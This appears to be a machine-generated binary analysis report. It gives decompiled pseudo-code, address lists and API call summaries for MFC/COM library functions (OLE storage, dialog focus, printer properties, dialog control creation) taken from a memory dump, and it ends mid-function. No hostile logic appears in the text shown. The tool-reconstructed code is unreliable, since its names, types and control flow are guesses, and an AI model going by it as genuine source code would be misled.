				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E004271DA(E0043AB20, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E004197B9(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x441e54, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E004272B2(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x441f04, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E00417DD0(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E0042450E(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E00417D92(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x441f14);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E004195C0(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x441e04, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

0x0041af08
0x0041af0f
0x0041af14
0x0041af16
0x0041af1b
0x0041af20
0x0041af23
0x0041af44
0x0041af4a
0x0041af4d
0x0041af50
0x0041af53
0x0041af5c
0x0041af64
0x0041af67
0x0041af9a
0x0041af9a
0x0041af9f
0x0041b004
0x0041b007
0x0041b073
0x0041b073
0x0041b077
0x0041b081
0x0041b083
0x0041b085
0x0041b1d4
0x0041b1d7
0x0041b1f1
0x0041b1f1
0x0041b1f6
0x0041b1fb
0x0041b1fb
0x0041b201
0x0041b208
0x0041b208
0x0041b20f
0x0041b212
0x0041b217
0x0041b217
0x0041b1d9
0x0041b1d9
0x0041b1dd
0x0041b1e4
0x0041b1e7
0x0041b1ec
0x0041b1ef
0x0041b1ef
0x00000000
0x0041b1dd
0x0041b08b
0x0041b08d
0x0041b0e7
0x0041b0ea
0x0041b19c
0x0041b1a3
0x0041b1a3
0x0041b1a6
0x0041b1a9
0x0041b1ac
0x0041b1af
0x00000000
0x00000000
0x0041b1b4
0x0041b1b6
0x0041b1c0
0x0041b1c2
0x0041b1d1
0x0041b1d1
0x0041b1c0
0x00000000
0x0041b1b4
0x0041b0f4
0x0041b0f7
0x0041b0f9
0x0041b0fc
0x0041b135
0x0041b135
0x0041b13c
0x0041b13f
0x0041b13f
0x0041b142
0x0041b145
0x00000000
0x00000000
0x0041b147
0x0041b150
0x0041b156
0x0041b158
0x0041b15b
0x00000000
0x00000000
0x0041b15d
0x0041b169
0x0041b16c
0x0041b172
0x0041b174
0x0041b177
0x0041b179
0x0041b185
0x0041b188
0x0041b18e
0x0041b18e
0x0041b191
0x0041b194
0x0041b197
0x00000000
0x0041b197
0x0041b0fe
0x0041b105
0x0041b107
0x0041b10d
0x0041b10f
0x0041b112
0x00000000
0x00000000
0x0041b115
0x0041b11b
0x0041b11d
0x00000000
0x00000000
0x0041b127
0x0041b12d
0x00000000
0x0041b12d
0x0041b100
0x0041b103
0x00000000
0x00000000
0x00000000
0x0041b103
0x0041b08f
0x0041b096
0x0041b099
0x0041b09f
0x0041b0a1
0x0041b0a4
0x00000000
0x00000000
0x0041b0aa
0x0041b0b7
0x0041b0ba
0x0041b0c0
0x0041b0c2
0x0041b0c5
0x0041b0c7
0x0041b0d3
0x0041b0d6
0x0041b0dc
0x0041b0dc
0x0041b0df
0x00000000
0x0041b0df
0x0041b009
0x0041b009
0x0041b00d
0x0041b017
0x0041b019
0x0041b01b
0x00000000
0x0041b01d
0x0041b01d
0x0041b01f
0x0041b03b
0x0041b047
0x0041b04a
0x0041b04f
0x0041b059
0x0041b05c
0x0041b05c
0x0041b05c
0x0041b063
0x0041b066
0x0041b021
0x0041b021
0x0041b02a
0x0041b02a
0x0041b06b
0x00000000
0x0041b06b
0x0041b01b
0x0041afa4
0x00000000
0x00000000
0x0041afaa
0x0041afb1
0x0041afb2
0x0041afb7
0x0041afbc
0x00000000
0x00000000
0x0041afc0
0x0041afc1
0x0041afc2
0x0041afc3
0x0041afcc
0x00000000
0x0041afce
0x0041afdd
0x0041afe0
0x0041afe3
0x0041aff0
0x0041aff3
0x0041aff9
0x0041affc
0x00000000
0x0041affc
0x0041afcc
0x0041af69
0x0041af74
0x0041af7e
0x00000000
0x00000000
0x0041af80
0x0041af8c
0x0041af91
0x0041af94
0x00000000
0x00000000
0x00000000
0x0041af94
0x0041af34
0x0041af3b
0x0041af3e
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0041AF0F

Part of subcall function 004195C0: SysStringLen.OLEAUT32(?), ref: 004195C8
Part of subcall function 004195C0: CoGetClassObject.OLE32(?,?,00000000,00441E84,?), ref: 004195E6

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0041B099
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0041B0BA
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041B107
GlobalLock.KERNEL32 ref: 0041B115
GlobalUnlock.KERNEL32(?), ref: 0041B12D
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 0041B150
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 0041B16C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: de54ea739fc7910b07c4836b410bb547e38cffd1e0fbd9e009b0ad6a9e09ef61
Instruction ID: 4c03f972a5dc34498395ff93685d317e015d5f345124410817bf1f4c641f5a16
Opcode Fuzzy Hash: de54ea739fc7910b07c4836b410bb547e38cffd1e0fbd9e009b0ad6a9e09ef61
Instruction Fuzzy Hash: 59C11BB090020AEFDB10DFA4C898AEEBBB9FF48344B10496EF915D7250D7759D91CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00414809, Relevance: 12.1, APIs: 8, Instructions: 85
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00414809(void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t30;
				struct HWND__* _t33;
				intOrPtr _t36;
				intOrPtr _t40;
				int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t62;
				void* _t64;
				signed int _t67;
				void* _t74;

				_t74 = __eflags;
				_t67 = _t54;
				_push(_t62);
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
				_t52 = 0;
				E004277B0(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
				_t33 = GetFocus();
				_t63 =  *((intOrPtr*)(_t67 + 0x74));
				_v8 = _t33;
				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E0040C30C(0, _t67, _t74);
				E00410EEA(0,  *((intOrPtr*)(_t67 + 0x74)), _t67, _t74);
				_t36 =  *((intOrPtr*)(_t67 + 0x74));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
				}
				_t64 = E0040E15E(_t52, _t63, _t67, 1);
				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
					E004128B9(_t52, _t64, __eflags, _t67);
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x74)));
				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
					_t40 = E004147F2();
				} else {
					_t40 = E004147DB();
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t81 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E0040C346(_t52, _t67, _t64, _t67, _t81);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}

0x00414809
0x0041480e
0x00414813
0x00414817
0x0041482a
0x00414830
0x00414838
0x0041483e
0x00414843
0x0041484c
0x0041484f
0x00414854
0x00414860
0x00414877
0x00414878
0x00414878
0x0041487f
0x0041488b
0x00414893
0x0041488d
0x0041488d
0x0041488d
0x0041489c
0x0041489f
0x004148a8
0x004148a1
0x004148a1
0x004148a1
0x004148ad
0x004148b3
0x004148b7
0x004148c1
0x004148c1
0x004148c7
0x004148cd
0x004148cf
0x004148d5
0x004148d5
0x004148dd
0x004148e2
0x004148ec
0x004148f0
0x00000000
0x004148f0
0x004148f3

APIs

lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,0040150E,00000001,00000000,00000000,00000006,00442798,00000000,00000000,765B253D), ref: 00414817
_memset.LIBCMT ref: 00414830
GetFocus.USER32 ref: 00414838
IsWindowEnabled.USER32(?), ref: 00414865
EnableWindow.USER32(?,00000000), ref: 00414878
EnableWindow.USER32(?,00000001), ref: 004148C1
IsWindow.USER32(?), ref: 004148C7
SetFocus.USER32(?), ref: 004148D5

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnableFocus$Enabled_memsetlstrlen
String ID:
API String ID: 2950697994-0
Opcode ID: 00adbc9a233fabc1c35c7c8caf6f181f9bd7698a11af9325482d4df268485e99
Instruction ID: 14070ca3c4857ef2bdef4c0e9fb2bcb010b476837c57688a8cf6be0fa9c418d9
Opcode Fuzzy Hash: 00adbc9a233fabc1c35c7c8caf6f181f9bd7698a11af9325482d4df268485e99
Instruction Fuzzy Hash: 2721CE31600B009FD721AF71ED89B5ABBE5FF80704F104A2EF556872A1DB79E851CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A95B, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040A95B(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E00416B68(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E00416B68( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x0040a95e
0x0040a960
0x0040a962
0x0040a96a
0x0040a984
0x0040a98c
0x0040a996
0x0040a99d
0x0040a99f
0x0040a9a4
0x0040a9a7
0x0040a9a7
0x0040a9be
0x0040a9c5
0x0040a9dd
0x0040a9e2
0x0040a9e7
0x0040a9e7
0x0040a9ed
0x0040a9ed
0x0040a99d
0x0040a9f2
0x0040a9f6

APIs

GlobalLock.KERNEL32 ref: 0040A978
lstrcmpA.KERNEL32(?,?), ref: 0040A984
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0040A996
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040A9B6
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040A9BE
GlobalLock.KERNEL32 ref: 0040A9C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0040A9D5
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0040A9ED

Part of subcall function 00416B68: GlobalFlags.KERNEL32(?), ref: 00416B73
Part of subcall function 00416B68: GlobalUnlock.KERNEL32(?,?,00000000,0040A9E7,?,00000000,?,?,00000000,00000000,00000002), ref: 00416B85
Part of subcall function 00416B68: GlobalFree.KERNEL32 ref: 00416B90

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 4e65e066ee7c0c736bfc62b430f519aee1a7dcbc9c477328668d6d0505356c1f
Instruction ID: 15369f7b54f955bbdbbf9b7ab217da6ef0376595c54705771d9723cb13c94d6a
Opcode Fuzzy Hash: 4e65e066ee7c0c736bfc62b430f519aee1a7dcbc9c477328668d6d0505356c1f
Instruction Fuzzy Hash: 9C11E3B1A00600BBCB216BB6CC49CAF7ABCFB89700B00496AFA11D1161C639DD50E738

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBE6, Relevance: 10.8, APIs: 7, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040BBE6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x44f5d0; // 0x765b253d
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E004271DA(E004399FC, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E00401FA0(_t246 + 0x28, E004151D0());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E0040A3C7(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E0041A476(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E00402030(_t233, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E00420072(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E0041830A(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E004188A7( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E00419A90( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							E0040BB45(0,  *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
